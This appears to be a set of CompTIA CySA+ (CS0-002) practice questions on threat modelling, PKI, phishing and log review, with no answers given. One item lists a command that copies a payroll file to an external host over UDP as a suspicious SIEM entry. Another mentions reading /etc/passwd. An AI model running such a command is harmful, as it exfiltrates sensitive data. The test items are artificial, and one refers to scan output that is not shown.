CS0-002 Online Practice Questions and Answers

A security analyst for a large financial institution is creating a threat model for a specific threat actor that is likely targeting an organization's financial assets. Which of the following is the BEST example of the level of sophistication this threat actor is using?

A. Social media accounts attributed to the threat actor

B. Custom malware attributed to the threat actor from prior attacks

C. Email addresses and phone numbers tied to the threat actor

D. Network assets used in previous attacks attributed to the threat actor

E. IP addresses used by the threat actor for command and control

A web-based front end for a business intelligence application uses pass-through authentication to authenticate users The application then uses a service account, to perform queries and look up data m a database A security analyst discovers employees are accessing data sets they have not been authorized to use. Which of the following will fix the cause of the issue?

A. Change the security model to force the users to access the database as themselves

B. Parameterize queries to prevent unauthorized SQL queries against the database

C. Configure database security logging using syslog or a SIEM

D. Enforce unique session IDs so users do not get a reused session ID

While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certAcate authority that is only used to sign intermediate certificates. Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Select TWO)

A. On a private VLAN

B. Full disk encrypted

C. Powered off

D. Backed up hourly

E. VPN accessible only

F. Air gapped

An organization has specific technical risk mitigation configurations that must be implemented before a new server can be approved for production Several critical servers were recently deployed with the antivirus missing unnecessary ports disabled and insufficient password complexity.

Which of the following should the analyst recommend to prevent a recurrence of this risk exposure?

A. Perform password-cracking attempts on all devices going into production

B. Perform an Nmap scan on all devices before they are released to production

C. Perform antivirus scans on all devices before they are approved for production

D. Perform automated security controls testing of expected configurations pnor to production

A vulnerability scan has returned the following information:

Which of the following describes the meaning of these results?

A. There is an unknown bug in a Lotus server with no Bugtraq ID.

B. Connecting to the host using a null session allows enumeration of share names.

C. Trend Micro has a known exploit that must be resolved or patched.

D. No CVE is present, so it is a false positive caused by Lotus running on a Windows server.

A threat intelligence analyst who is working on the SOC floor has been forwarded an email that was sent to one of the executives in business development. The executive mentions the email was from the Chief Executive Officer (CEO), who was requesting an emergency wire transfer. This request was unprecedented. Which of the following threats MOST accurately aligns with this behavior?

A. Phishing

B. Whaling

C. Spam

D. Ransomware

A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

A. nmap -A -sV 192.168.1.235

B. cat payroll.csv > /dev/udp/123.456.123.456/53

C. cat/etc/passwd

D. mysql -h 192.168.1.235 -u test -p

In web application scanning, static analysis refers to scanning:

A. the system for vulnerabilities before installing the application.

B. the compiled code of the application to detect possible issues.

C. an application that is installed and active on a system.

D. an application that is installed on a system that is assigned a static IP.

A security analyst receives an alert to expect increased and highly advanced cyberattacks originating from a foreign country that recently had sanctions implemented. Which of the following describes the type of threat actors that should concern the security analyst?

A. Insider threat

B. Nation-state

C. Hacktivist

D. Organized crime

An analyst needs to provide recommendations for the AUP Which of the following is the BEST recommendation to protect the company's intellectual property?

A. Company assets must be stored in a locked cabinet when not in use.

B. Company assets must not be utilized for personal use or gain.

C. Company assets should never leave the company's property.

D. AII Internet access must be via a proxy server.